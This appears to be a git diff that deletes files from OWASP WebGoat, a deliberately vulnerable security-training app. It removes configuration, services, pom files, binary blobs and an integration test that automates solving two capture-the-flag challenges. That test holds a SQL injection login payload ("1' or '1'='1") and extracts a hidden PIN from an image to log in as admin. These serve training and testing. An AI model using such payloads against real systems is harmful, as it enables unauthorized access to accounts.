-     * specific tables we use. This way we clean the data in the lesson database quite easily see {@link RestartLessonService#restartLesson()}
-     * for how we clean the lesson related tables.
-     */
-
-    @Bean(initMethod = "migrate")
-    public Flyway flyWayContainer(DataSource dataSource) {
-        return Flyway
-                .configure()
-                .configuration(Map.of("driver", driverClassName))
-                .dataSource(dataSource)
-                .schemas("container")
-                .locations("db/container")
-                .load();
-    }
-
-    @Bean
-    public Function<String, Flyway> flywayLessons(LessonDataSource lessonDataSource) {
-        return schema -> Flyway
-                .configure()
-                .configuration(Map.of("driver", driverClassName))
-                .schemas(schema)
-                .dataSource(lessonDataSource)
-                .load();
-    }
-
-    @Bean
-    public LessonDataSource lessonDataSource(DataSource dataSource) {
-        return new LessonDataSource(dataSource);
-    }
-}
\ No newline at end of file
diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonProgressService.java b/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonProgressService.java
deleted file mode 100644
index 495e5c8bd..000000000
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonProgressService.java
+++ /dev/null
@@ -1,102 +0,0 @@
-package org.owasp.webgoat.service;
-
-import lombok.AllArgsConstructor;
-import lombok.Getter;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.lessons.Assignment;
-import org.owasp.webgoat.lessons.LessonInfoModel;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.LessonTracker;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.users.UserTrackerRepository;
-import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
-
-import java.util.ArrayList;
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-
-
-/**
- * <p>LessonProgressService class.</p>
- *
- * @author webgoat
- */
-@Controller
-@AllArgsConstructor
-public class LessonProgressService {
-
-    private final UserTrackerRepository userTrackerRepository;
-    private final WebSession webSession;
-
-    /**
-     * Endpoint for fetching the complete lesson overview which informs the user about whether all the assignments are solved.
-     * Used as the last page of the lesson to generate a lesson overview.
-     *
-     * @return list of assignments
-     */
-    @RequestMapping(value = "/service/lessonoverview.mvc", produces = "application/json")
-    @ResponseBody
-    public List<LessonOverview> lessonOverview() {
-        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
-        Lesson currentLesson = webSession.getCurrentLesson();
-        List<LessonOverview> result = new ArrayList<>();
-        if (currentLesson != null) {
-            LessonTracker lessonTracker = userTracker.getLessonTracker(currentLesson);
-            result = toJson(lessonTracker.getLessonOverview(), currentLesson);
-        }
-        return result;
-    }
-
-    private List<LessonOverview> toJson(Map<Assignment, Boolean> map, Lesson currentLesson) {
-        List<LessonOverview> result = new ArrayList();
-        for (Map.Entry<Assignment, Boolean> entry : map.entrySet()) {
-            Assignment storedAssignment = entry.getKey();
-            for (Assignment lessonAssignment : currentLesson.getAssignments()) {
-                if (lessonAssignment.getName().equals(storedAssignment.getName())
-                        && !lessonAssignment.getPath().equals(storedAssignment.getPath())) {
-                    //here a stored path in the assignments table will be corrected for the JSON output
-                    //with the value of the actual expected path
-                    storedAssignment.setPath(lessonAssignment.getPath());
-                    result.add(new LessonOverview(storedAssignment, entry.getValue()));
-                    break;
-
-                } else if (lessonAssignment.getName().equals(storedAssignment.getName())) {
-                    result.add(new LessonOverview(storedAssignment, entry.getValue()));
-                    break;
-                }
-            }
-            //assignments not in the list will not be put in the lesson progress JSON output
-
-        }
-        return result;
-    }
-
-    private boolean isLessonComplete(Map<Assignment, Boolean> map, Lesson currentLesson) {
-        boolean result = true;
-        for (Map.Entry<Assignment, Boolean> entry : map.entrySet()) {
-            Assignment storedAssignment = entry.getKey();
-            for (Assignment lessonAssignment : currentLesson.getAssignments()) {
-                if (lessonAssignment.getName().equals(storedAssignment.getName())) {
-                    result = result && entry.getValue();
-                    break;
-                }
-            }
-
-        }
-        return result;
-    }
-
-    @AllArgsConstructor
-    @Getter
-    //Jackson does not really like returning a map of <Assignment, Boolean> directly, see http://stackoverflow.com/questions/11628698/can-we-make-object-as-key-in-map-when-using-json
-    //so creating intermediate object is the easiest solution
-    private static class LessonOverview {
-
-        private Assignment assignment;
-        private Boolean solved;
-
-    }
-}
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/TestApplication.java b/webgoat-container/src/test/java/org/owasp/webgoat/TestApplication.java
deleted file mode 100644
index f7c82bf57..000000000
--- a/webgoat-container/src/test/java/org/owasp/webgoat/TestApplication.java
+++ /dev/null
@@ -1,33 +0,0 @@
-package org.owasp.webgoat;
-
-import org.hsqldb.jdbc.JDBCDriver;
-import org.springframework.beans.factory.annotation.Value;
-import org.springframework.boot.autoconfigure.SpringBootApplication;
-import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty;
-import org.springframework.context.annotation.Bean;
-import org.springframework.context.annotation.Primary;
-import org.springframework.jdbc.datasource.DriverManagerDataSource;
-
-import javax.sql.DataSource;
-import java.sql.DriverManager;
-import java.sql.SQLException;
-
-@SpringBootApplication
-public class TestApplication {
-
-    @Value("${spring.datasource.driver-class-name}")
-    private String driverClassName;
-
-    /**
-     * We define our own datasource, otherwise we end up with Hikari one which for some lessons will
-     * throw an error (feature not supported)
-     */
-    @Bean
-    @ConditionalOnProperty(prefix = "webgoat.start", name = "hsqldb", havingValue = "false")
-    @Primary
-    public DataSource dataSource(@Value("${spring.datasource.url}") String url) throws SQLException {
-        DriverManager.registerDriver(new JDBCDriver());
-        return new DriverManagerDataSource(url);
-    }
-
-}
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/service/LabelServiceTest.java b/webgoat-container/src/test/java/org/owasp/webgoat/service/LabelServiceTest.java
deleted file mode 100644
index 0450fd0a6..000000000
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/LabelServiceTest.java
+++ /dev/null
@@ -1,77 +0,0 @@
-package org.owasp.webgoat.service;
-
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.assignments.LessonTrackerInterceptor;
-import org.owasp.webgoat.users.UserService;
-import org.owasp.webgoat.users.UserTrackerRepository;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.boot.test.autoconfigure.web.servlet.WebMvcTest;
-import org.springframework.boot.test.mock.mockito.MockBean;
-import org.springframework.security.test.context.support.WithMockUser;
-import org.springframework.test.context.ActiveProfiles;
-import org.springframework.test.web.servlet.MockMvc;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
-import static org.owasp.webgoat.service.LabelService.URL_LABELS_MVC;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-
-/**
- * ************************************************************************************************
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * <p>
- *
- * @author nbaars
- * @version $Id: $Id
- * @since November 29, 2016
- */
-@WebMvcTest(value = {LabelService.class})
-@ActiveProfiles({"test", "webgoat"})
-class LabelServiceTest {
-
-    @Autowired
-    public MockMvc mockMvc;
-    @MockBean
-    private UserService userService;
-    @MockBean
-    private UserTrackerRepository userTrackerRepository;
-    @MockBean
-    private LessonTrackerInterceptor lessonTrackerInterceptor;
-
-    @Test
-    @WithMockUser(username = "guest", password = "guest")
-    void withoutLocale() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get(URL_LABELS_MVC))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("password", CoreMatchers.is("Password")));
-    }
-
-    @Test
-    @WithMockUser(username = "guest", password = "guest")
-    void withLocale() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get(URL_LABELS_MVC).param("lang", "nl"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("password", CoreMatchers.is("Wachtwoord")));
-    }
-}
\ No newline at end of file
diff --git a/webgoat-container/src/test/resources/org/owasp/webgoat/plugins/lessonSolutions/rewrite_test.html b/webgoat-container/src/test/resources/org/owasp/webgoat/plugins/lessonSolutions/rewrite_test.html
deleted file mode 100644
index dde467046..000000000
--- a/webgoat-container/src/test/resources/org/owasp/webgoat/plugins/lessonSolutions/rewrite_test.html
+++ /dev/null
@@ -1,11 +0,0 @@
-<!DOCTYPE html>
-<html>
-<head lang="en">
-    <meta charset="UTF-8">
-    <title></title>
-</head>
-<body>
-<v:imagedata src="TestPlugin_files/image001.png" o:title=""/>
-<v:imagedata src="Unknown_files/image001.png" o:title=""/>
-</body>
-</html>
\ No newline at end of file
diff --git a/webgoat-integration-tests/pom.xml b/webgoat-integration-tests/pom.xml
deleted file mode 100644
index 9ef25459e..000000000
--- a/webgoat-integration-tests/pom.xml
+++ /dev/null
@@ -1,73 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>webgoat-integration-tests</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat</groupId>
-        <artifactId>webgoat-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.seleniumhq.selenium</groupId>
-            <artifactId>selenium-java</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>io.github.bonigarcia</groupId>
-            <artifactId>webdrivermanager</artifactId>
-            <version>4.3.1</version>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat</groupId>
-            <artifactId>webgoat-server</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat</groupId>
-            <artifactId>webgoat-server</artifactId>
-            <version>${project.version}</version>
-            <classifier>internal</classifier>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat</groupId>
-            <artifactId>webwolf</artifactId>
-            <version>${project.version}</version>
-            <classifier>internal</classifier>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat</groupId>
-            <artifactId>webwolf</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>io.rest-assured</groupId>
-            <artifactId>rest-assured</artifactId>
-            <scope>test</scope>
-        </dependency>
-    </dependencies>
-
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-surefire-plugin</artifactId>
-                <version>${maven-surefire-plugin.version}</version>
-                <configuration>
-                    <!-- Otherwise test will fail with JDK16 -->
-                    <argLine>
-                        --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.base/java.text=ALL-UNNAMED --add-opens java.desktop/java.beans=ALL-UNNAMED --add-opens java.desktop/java.awt.font=ALL-UNNAMED --add-opens java.base/sun.nio.ch=ALL-UNNAMED
-                    </argLine>
-                </configuration>
-            </plugin>
-        </plugins>
-    </build>
-</project>
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/ChallengeTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/ChallengeTest.java
deleted file mode 100644
index 7eea53f56..000000000
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/ChallengeTest.java
+++ /dev/null
@@ -1,114 +0,0 @@
-package org.owasp.webgoat;
-
-
-import static org.junit.jupiter.api.Assertions.assertTrue;
-
-import java.util.Arrays;
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-
-import org.junit.jupiter.api.Test;
-
-import io.restassured.RestAssured;
-import static org.owasp.webgoat.challenges.SolutionConstants.PASSWORD;
-
-
-public class ChallengeTest extends IntegrationTest {
-	
-	@Test
-    public void testChallenge1() {
-    	startLesson("Challenge1");      
-    	
-    	byte[] resultBytes = 
-        		RestAssured.given()
-                .when()
-                .relaxedHTTPSValidation()
-                .cookie("JSESSIONID", getWebGoatCookie())
-                .get(url("/WebGoat/challenge/logo"))
-                .then()
-                .statusCode(200)
-                .extract().asByteArray();
-    	
-    	String pincode = new String(Arrays.copyOfRange(resultBytes, 81216, 81220));
-    	Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("username", "admin");
-        params.put("password", PASSWORD.replace("1234", pincode));
-       
-    	
-        checkAssignment(url("/WebGoat/challenge/1"), params, true);
-        String result = 
-        		RestAssured.given()
-                .when()
-                .relaxedHTTPSValidation()
-                .cookie("JSESSIONID", getWebGoatCookie())
-                .formParams(params)
-                .post(url("/WebGoat/challenge/1"))
-                .then()
-                .statusCode(200)
-                .extract().asString();
-        
-        String flag = result.substring(result.indexOf("flag")+6,result.indexOf("flag")+42);
-    	params.clear();
-       	params.put("flag", flag);
-        checkAssignment(url("/WebGoat/challenge/flag"), params, true);
-         
-  
-        checkResults("/challenge/1");      
-        
-        List<String> capturefFlags = 
-        		RestAssured.given()
-                .when()
-                .relaxedHTTPSValidation()
-                .cookie("JSESSIONID", getWebGoatCookie())
-                .get(url("/WebGoat/scoreboard-data"))
-                .then()
-                .statusCode(200)
-                .extract().jsonPath()
-                .get("find { it.username == \"" + getWebgoatUser() + "\" }.flagsCaptured");
-        assertTrue(capturefFlags.contains("Admin lost password"));
-    }
-	
-	@Test
-    public void testChallenge5() {
-    	startLesson("Challenge5");      
-    	
-    	Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("username_login", "Larry");
-        params.put("password_login", "1' or '1'='1");
-       
-        String result = 
-        		RestAssured.given()
-                .when()
-                .relaxedHTTPSValidation()
-                .cookie("JSESSIONID", getWebGoatCookie())
-                .formParams(params)
-                .post(url("/WebGoat/challenge/5"))
-                .then()
-                .statusCode(200)
-                .extract().asString();
-        
-        String flag = result.substring(result.indexOf("flag")+6,result.indexOf("flag")+42);
-    	params.clear();
-       	params.put("flag", flag);
-        checkAssignment(url("/WebGoat/challenge/flag"), params, true);
-         
-  
-        checkResults("/challenge/5");      
-        
-        List<String> capturefFlags = 
-        		RestAssured.given()
-                .when()
-                .relaxedHTTPSValidation()
-                .cookie("JSESSIONID", getWebGoatCookie())
-                .get(url("/WebGoat/scoreboard-data"))
-                .then()
-                .statusCode(200)
-                .extract().jsonPath()
-                .get("find { it.username == \"" + getWebgoatUser() + "\" }.flagsCaptured");
-        assertTrue(capturefFlags.contains("Without password"));
-    }
-    
-}
diff --git a/webgoat-integration-tests/src/test/resources/application-inttest.properties b/webgoat-integration-tests/src/test/resources/application-inttest.properties
deleted file mode 100644
index a694bd592..000000000
--- a/webgoat-integration-tests/src/test/resources/application-inttest.properties
+++ /dev/null
@@ -1,10 +0,0 @@
-#In order to run tests a known temp directory is preferred
-#that is why these values are used
-
-webgoat.user.directory=${java.io.tmpdir}/webgoat
-webgoat.server.directory=${java.io.tmpdir}/webgoat
-webwolf.fileserver.location=${java.io.tmpdir}/webwolf-fileserver
-
-#database will get deleted for every mvn clean install
-#as these extra properties are read by WebGoat and WebWolf the drop of the tables 
-#was not helpful. 
\ No newline at end of file
diff --git a/webgoat-integration-tests/src/test/resources/logback-test.xml b/webgoat-integration-tests/src/test/resources/logback-test.xml
deleted file mode 100644
index 2ee84585a..000000000
--- a/webgoat-integration-tests/src/test/resources/logback-test.xml
+++ /dev/null
@@ -1,15 +0,0 @@
-<configuration />
-
-<!--
-Enable below if you want to debug a unit test and see why the controller fails the configuration above is there
-to keep the Travis build going otherwise it fails with too much logging.
-//TODO we should use a different Spring profile for Travis
--->
-
-<!--
-<configuration>
-<include resource="org/springframework/boot/logging/logback/base.xml"/>
-<logger name="org.springframework.web" level="DEBUG"/>
-</configuration>
-
--->
\ No newline at end of file
diff --git a/webgoat-lessons/auth-bypass/.DS_Store b/webgoat-lessons/auth-bypass/.DS_Store
deleted file mode 100644
index 0d597e3dbf596974fdd877729e0dab83badc8e41..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLT}&KB9RL3hN_Y6M1BG%uY`qkbiidKAf@o6@xMCaH6g}X8qPTavz{X|wa=Uk+
zgos9?ZPcjI2VYFAAJx9-ix29HFE*{l_+U*+)ED1;GEpCV@WKD=EFb0Lt<fgk+06WB
z{vWfmzxicmX8-_u3tAi?3;+scA$bKATO?r@c~c7c8WD#S4^A#)+8Jv7lgVxJ4io_b
z0RjO60RjO60RlGz0<>p~q-?YAOKVUD2m}b+k_d?PAxc@ugfEw*^p*}Pydwa~Qc`<~
z>RePvMtzy^<&u<Sp@cG&qzpy>h=DSk^ikh0;mai{WjLUJ_(1>7=$}x~dpq?X_1pmy
zQU+y!K!Ctz1jOE70uJOMo0(gGem4!rZEIV`P)X^IvYiSmuMiKfE`KaFW6z~r)h#%^
zYW|GZGBiEo*9TR1W~Dx4+vaLr&5RiO+$68<vn^LOEIq$2bRun7nmyNR7c9-0NXh=v
zhUU&p^18viUZl`L)zU`{$H*9_;Xb7>@l5iDg@x95M`w2|8gIXUF&15jx3?dPMY|4n
zEH3h26s6(r!#$_Qa*OBAzxVzJA71$A(q#z(`U?r{-T=y#HAFNgYi8&hgsTtI6zMjo
z%;|V4YtOE~@$j8Zr#L8YL_&{bauU&NtBA6Sa8GS--z4V+M}Jf|Ro5u$N!8VzNxsV=
zkWXZ7%m4Ot);0^X7FnvZs+ld2v)*HxDdTC~8Flq}SJcKGJMZ>+j-v*}3f&~H5!jv1
zxrS{yBYNH;$=Jopy2$><gRO_Uj$Ey}Z5L-XtTtT~;F|jIoWOldb+Wpp8P@bT&4%R~
zQ-+>r)uHd$kfqM*GO9kjm+{Y(35|wx%GQLB=2^n^;eCp7M(F$UI+aq*qTvIKtICi=
zLz7)Jv1Y~{HuNMBK!&!kn8GzSY^oXEl&bq!T;T&OU6kXO$`014RAY>d68N(;LPx5*
z!w)L_vhuii_es@pPv>-NZB!2_%9yb9Xqv7mjfsPD_8Svzvckniv=?G<6#8KtvS7g+
zybQ0vtME3Qhl}tjd;wp>CAb3L!1r(smf<J(8GeI5;7|Aq0U4HKC01b#HsI~JAMe0B
zu@&#dHjHBzCa?$lFo`E|7)Njn$1#g0&Z3Pud<I{_vv>~Q#JBJrydcLDTA^uDwpU90
zm}+Y@^Do{)>8)rM>92Y?`M=O?xl)j;x@LE6ozJ$O)!FiBw4NazDdensY*?A?4KsN?
z+4c|xBMofdcH|u<TIus1Px#KO!kb0e0guNVymq81(yS1Pc}SXDA~8WxULvg?^)$wJ
zNGp*}(3O`;Yd0gZ4KQ9Nn@1xF!9A`>=cY)KDIB+;*|sEmmnilLd<kC>#lD3f;8*w^
z{w7+LA;&#fj}fBPKD-N?u?6oTVs#R!y72)#g2%8QkK+j(z#$@68b>{HX*h+`XkZ>4
zEMO7m@mYKhpT`&QMSKlk$2TP1HjwT33eBYS$mo-8)=nn1f|~{Sv1{gY&%SEWwz1@9
zwp$^Ksk~*{)-?4ah+YORsI(VNgAVTc)mM%qC~qhNC9=1$_y;(){r&$9eP_^FfIxu2
z&4mD#CR52?8q><Z#>U}^vv!p76O=^~eoIn%Ayiy<5kPJKIPUpI$yLN8e7Pj07fO0B
Ul;nSO5fJSE!Tv7@c#Efh0lIMvPyhe`

diff --git a/webgoat-lessons/auth-bypass/pom.xml b/webgoat-lessons/auth-bypass/pom.xml
deleted file mode 100644
index cdc98514d..000000000
--- a/webgoat-lessons/auth-bypass/pom.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>auth-bypass</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-</project>
diff --git a/webgoat-lessons/auth-bypass/src/.DS_Store b/webgoat-lessons/auth-bypass/src/.DS_Store
deleted file mode 100644
index 0913be2c6a6da292e48938f7d77736dcbcacfda0..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLTWl0n82<llfgP@AxenBoiKPaxD5XG)0@-fMO(0aacaS=}Gqe+DXEr;tyJ%Cb
zF)A@?jF$&rOvDRHVtg<@853V5s6ijZ1RhL`iBX?SeDcAd|GDhC^b&khBXc%${&W7z
znSZ|X^_-pq0GKXWZ2&p|#OdLZEuw0c!tMN-QDRE7f+SKrWGg`->-t&h|31SzQbY(u
z2t)`(2t)`(2>cfipgo(H_#FGbv_^G=K!m_ei2z?840^asDLEyjSURW@M*xzIq!xwR
zj5kOcN~V;Yl9DV`P==C}p{R}+D8or_D8H1FQ&P%sKy~;)^=4Ej6clf#@eSb)n36K8
zBLpG@W+K4P?v0QK6CCjB&+plS>jdG}tyeMD&^T}Yg1EMD5&yBo!Ur<rekBu{VJS$P
z#p9yqSaw#md(CjX+V1mxx7IeZ1CCu8Wh=XVFEky`F4l#f7<4?#ucZBwX9XuRa=byu
z3dcv;s@|eqrqEu~vj?2O$vUnRJ{;HhZ<IAnOl)b}zH?Wr(bnEM*=kI*wYP6;H9B@|
zpPXdh#^X(!c61#bE=)di_Ki2+di&fv7cNQ|P%S0EF{m$}QKyE973AD3eFb-}DNm7h
zhSD8t%jEogp>C*JfE$#1<;_U!zACa;YRGDf^sYp@dz7(KVBc@MX6Tgd9y7FqQMN1~
zun*;YPhl{a^W9S3BTFJ@y15cL+g+}kaUQXQq0l}Z^43V;7sGDhIOI?)*Nw8}9K&OU
z(DA)sz%B+PHSPT3RqJkT-neC3$L`BZmM&w7<(f7^=zF1a%CU?66+Q*SW{|Tz%kjnr
z%N&2#?(@vNorqo1G!eCWjjo-rD3znW#p5jYVO(08*68|iZs{)CR9o@52v~3ET3<kE
zF;h8iXwkI3hlm6$P=jvTtm*x(nYCSJX)^52yEJ{UEOTdvm9l-irVkPFc}hA+V5?Gh
z?$Y&>{LM$qAUsyEJ<95$di@^CYM9%)EQ{w9Z%%EL^VXc&DjSS%No%1M_QHM`fgE^H
zfoI`4cphGbv+y2#03XAr@Ht$9FX1b=0zbfy@DuzDzrr>60|7N$iVPFD9GlR<+prlo
z;1+Dh9k>%aFog&4UObFPupdvNiCN5{ixW7BkK$u^24BRN@MU}jU&C`UpIDWyJ#_@5
zCcaBmJ<-$^Tx@VQq9yk)IgtKWh<0_cq}Pg-s}$e5YLh0|RL>GY4LSFM6V*ANHlNo~
z?lO^Z?Ybr{*-s?0PtV0%wm?#Zd#^V%je(>w?{8>HCRvQQ8yACZ+MLu_gJ3AP68VyB
zp5P+y674kBDA>xoox8|7Uyzb__w1#i;(~Czn{J_@kQS_&M4OXlufutGA3lOl-~xOB
zU&HtC3;YJxu#t$h8g-)8EttgHaU<S=twgPz*ok-JJ-8e9;Q>4(=+%b<IE2GELiDn6
z49C&IB8FJT3ZBNt@d<nqpTei{g}(?ljcy00(T&rwMz_4*(_@vw9Kbh0?3nPZvsrW6
z3gdIHmE}y)bA4}&Mw5$f2sQ)|Uccxn<*bXYvehNmG5(!Ou4bzxH^Vkda?7AZfBzwE
zk|DU1js*ss0-xFz^@_7(af67u+^WFcFrt?6-;9{$I|K;TszEk%e*WJ#_x*p>J(3Xu
z5d!~11hBCu)03tTtNw>E{TumN+o0z`dU)Y}Q&Nf$s;;{TpuRee3txj=c}z;lDJexL
a=|w2Xf9N70+W({dAHuv}+f8rI{r^umCXx04

diff --git a/webgoat-lessons/auth-bypass/src/main/.DS_Store b/webgoat-lessons/auth-bypass/src/main/.DS_Store
deleted file mode 100644
index 7ee598c2b590178fb052c7c2e0e89086ab62c78b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 10244
zcmeHMU2GIp6h3F$!t4Mt+k#!F3u{Uv#TF?oP!w=mihw|9+|oa)>+H_hj?T_(c4l``
ztk#hD7o+hfF)`7^R>f%KNu%+>#211w{v~MagT9y;^~uC16B9l6-r2e?+XoY&nA|&=
zd+yIU_ul#LH*@x$1pw?X7+nBy08r>=Qd>z`jl}xdeMt%hEgDHAdq|hOT-tWiRR7}=
zZP_3ZkO)WwBmxoviNMu>0Qqc|lodkCTp}P5kO(Xwz`hT0x|vJ_az;r0>7a}s0Z7(U
zGfz}z#{p&&4`d>cGeS}iB^0J4g((I{3>4<n9uM>qft(Rim;(lf4-96;;DmyFb{ap<
z)d3Si%3LBK5x5iq_PW%=y`V!8^vd&lI%iv+zirz*hU)4YmMvGp>I!yg5%tdGlv_&r
zx?k}6_54X*vkWsGlm~Txs$3p&U3;Odr-v=Gl+xDhcO75195Y{GIx%87hFj`)3y$GU
zB*l0mmf=sOw6%kIvq+|cx?>Joo|U$2%fDX<vn!>woIc&z)zh=PBi_~3JKYgK-PPT_
zy(7MBN6+-M_MM`%wD0IUHkO-ya(3>u*WWn%=J^W(1`IwW&{PG>CzY7klU>P-o6S||
zEZ}8(#X%A82)SjvzOBG3IuKEBOKFX4?Z<Pz<vQN5nfFMhwACJgcsS!a!LyBIT)U8U
zyp$Hn=ys-H>%Q4%+ezyI(;M~8Q$8z=dv4y}&lOXeR`AR_OwzN8<^XAXqZSRv)HDpg
zwQ}wH4Xv9yx9{3>an&`ewMe6?juWVkZ{1^=`4c6E?3nIlOvkXC$&n(1)i#G5J!?in
zpM}HR>e}Y0I$_Y*$6SNi8QOb_=xJ$=Mo+Sy{dtpeLs7WF#&}d6^4JpeKyg!>st(;p
zd#icDpzT}K=m}d-o3>_zh1u4d)aXc2K%*TA8oPVc=qN#-rA2!Y><F5BcSoalv6+wR
zo_{=NI<%?_H2vOvx2}pdNBhf<QvHaEGRCa>41-qNn%FEhG~All7Hq8o>tHK6x<fDl
zCgk7@JOxj~Gw>43!8v#rK7#Y`DSQrJz?U!&Kf+J&GyDR-!Ji0-sN!mjU?Vo+b$C6t
z;wEgvt=NM*aToStA0EadcodJ}Fs3k#88k4958^}kFwWo;_$<DNui`Au;X8N^-^UNc
znnGoY9;~1r74c)rDrp#m-9jU^Xc#-tq#j%v8qTj2<ZD{9Heh4l!j@KTVkMh6g#<@9
zcgo!0^!x`QFA_!9t#46dCx~L^sp?HHlR;Z92*k8E#$z!};hbUBO>I;S5wR6MR{NHi
zs?~A&vR-0lOl#moWmV#&s?~EUvuf{d>RrYe%c^_#Q7?$sht<PvF_pei|AuU{@HTwN
ziS`wI1K-0B@GJaI6l)-QHRC!WR}44c4cLx1Vh45-y?XIxyao5*0X#?~yPaq@L?j!<
zF&rnFnK+44Xki|GEMf^y;UjnkAH~P;aU$Jw_&mOVFXJm!bURc<x3iUW%en&tM#0Yj
zeC;)epIZx5%(}*+eYvT{zof-v-mzV0lICHQ4?~__K@VIgP$|R8|7YK{lli9Z|I9bl
zK&OV6s--3UmGoCj=C5iKQhF}wxh}KkszJO;9~K(o-ma$B-`;F-tr~u<##mJzj!!8w
ziNF#fP$%Y&v-tmk#sB|b!WGJ?B?1zG%Z&im4<rZrX_j)dp?X3VYmd`?H{C2Ty%{07
y31vJSPm+h@slvkXJj6n6<p2w_OHezLGeS~{(iQ(RK%W2Q`M-4KV$)aS`TsAcj4X8k

diff --git a/webgoat-lessons/auth-bypass/src/main/java/.DS_Store b/webgoat-lessons/auth-bypass/src/main/java/.DS_Store
deleted file mode 100644
index da3ec95ed2fb32595ebe59649631acf665cd4ed2..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0UrZcD9LImZ1KPc9D|=96DPDU9h@}ETO9iy82OQGck`j;qMbEw46*lheUT*ge
z6j4kQ|HWwhlbD!jBB(VQ`=rtMVB$+tWBiv?BM<swV$>%SpG-{jH#<Y2P#%1!HR;Y}
z=Qsa;Gjreh+|11a0QMC0HUJd>Bzl-two!DM!0OqvA%sK;t3>h#H<z}YH0AzE=Qgws
z3IYWJ1p);E1p);E1^y2T(3#DGw8^>8YlApYAW-0%RDkUdF?yJd3%kIrzjaXLUjfLL
zQn4Q>t*`{yn6PnS7r3Pw3dmi_a#s{r4CL-q9uw{2!Y**j-2uhr1I5TFZYb!FPW{LH
z=74c-gE&wiP++41>}OK~4&-4fJ+t=yZkevv+PaLPlG3s*TcxnPjeV4ed{1)PnMrz@
zS8#i@{3$<Y>PA|m2Q_bcB|YRg*2T1z9x;uXl(Mteu|3VSjr<zd$x+kRotYk|VC(K=
zlJ_@i>fUrpsT#~1MRFa~Y-7Z9&9rHm-h)z@eNsy8++1^8dwW+?tgWqcz9}}>cHqGN
zrdY?p_W60`2T7`JJlH)jo|}Jqap{dW-#YX5x$|5E6dMUtt`p_6RYk0+wq(Z1u6>sw
